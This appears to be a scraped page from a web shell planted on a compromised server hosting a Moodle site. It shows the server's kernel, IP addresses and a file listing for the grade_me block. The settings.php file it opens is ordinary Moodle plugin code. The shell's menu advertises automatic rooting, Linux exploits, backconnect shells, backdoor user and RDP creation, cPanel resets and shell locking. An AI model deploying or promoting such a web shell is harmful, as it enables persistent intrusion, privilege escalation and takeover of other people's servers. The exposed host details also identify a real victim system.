Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.165
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
grade_me /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
javascript
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
13
B
-rw-r--r--
CONTRIBUTING.md
1.24
KB
-rw-r--r--
LICENSE
34.32
KB
-rw-r--r--
README.md
1.39
KB
-rw-r--r--
block_grade_me.php
7.25
KB
-rw-r--r--
lib.php
19.73
KB
-rw-r--r--
package-lock.json
105.39
KB
-rw-r--r--
package.json
760
B
-rw-r--r--
quiz_update_ngrade.php
1.71
KB
-rw-r--r--
settings.php
3.16
KB
-rw-r--r--
styles.css
4.58
KB
-rw-r--r--
version.php
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. defined('MOODLE_INTERNAL') || die; if ($ADMIN->fulltree) { $settings->add(new admin_setting_configcheckbox('block_grade_me_enableadminviewall', get_string('settings_adminviewall', 'block_grade_me'), get_string('settings_configadminviewall', 'block_grade_me'), 0)); $settings->add(new admin_setting_configtext('block_grade_me_maxcourses', get_string('settings_maxcourses', 'block_grade_me'), get_string('settings_configmaxcourses', 'block_grade_me'), 10, PARAM_INT)); $settings->add(new admin_setting_configtext('block_grade_me_maxage', get_string('settings_maxage', 'block_grade_me'), get_string('settings_configmaxage', 'block_grade_me'), 0, PARAM_INT)); $settings->add(new admin_setting_configcheckbox('block_grade_me_enableshowhidden', get_string('settings_showhidden', 'block_grade_me'), get_string('settings_configshowhidden', 'block_grade_me'), 0)); $plugins = get_list_of_plugins('blocks/grade_me/plugins'); foreach ($plugins as $plugin) { if (file_exists($CFG->dirroot . '/blocks/grade_me/plugins/' . $plugin . '/' . $plugin . '_plugin.php')) { include_once($CFG->dirroot . '/blocks/grade_me/plugins/' . $plugin . '/' . $plugin . '_plugin.php'); if (function_exists('block_grade_me_required_capability_' . $plugin)) { $requiredcapability = 'block_grade_me_required_capability_' . $plugin; $a = $requiredcapability(); $component = 'mod_' . $plugin; if (\core_plugin_manager::instance()->get_plugin_info($component)) { $langshowmod = get_string('settings_enablepre', 'block_grade_me'); $langshowmod .= ' ' . get_string('modulenameplural', $component); $langmodname = get_string('modulename', $component); $langshowdesc = get_string('settings_configenablepre', 'block_grade_me', ['plugin_name' => $langmodname]); $settingname = 'block_grade_me_enable' . $plugin; $default = (isset($a[$plugin]) && isset($a[$plugin]['default_on'])) ? $a[$plugin]['default_on'] : false; $settings->add(new admin_setting_configcheckbox($settingname, $langshowmod, $langshowdesc, $default)); } } } } $label = get_string('grade_me_tools', 'block_grade_me'); $desc = get_string('grade_me_tools_desc', 'block_grade_me', $CFG->wwwroot); $settings->add(new admin_setting_heading('grade_me_tools', $label, $desc)); }
Close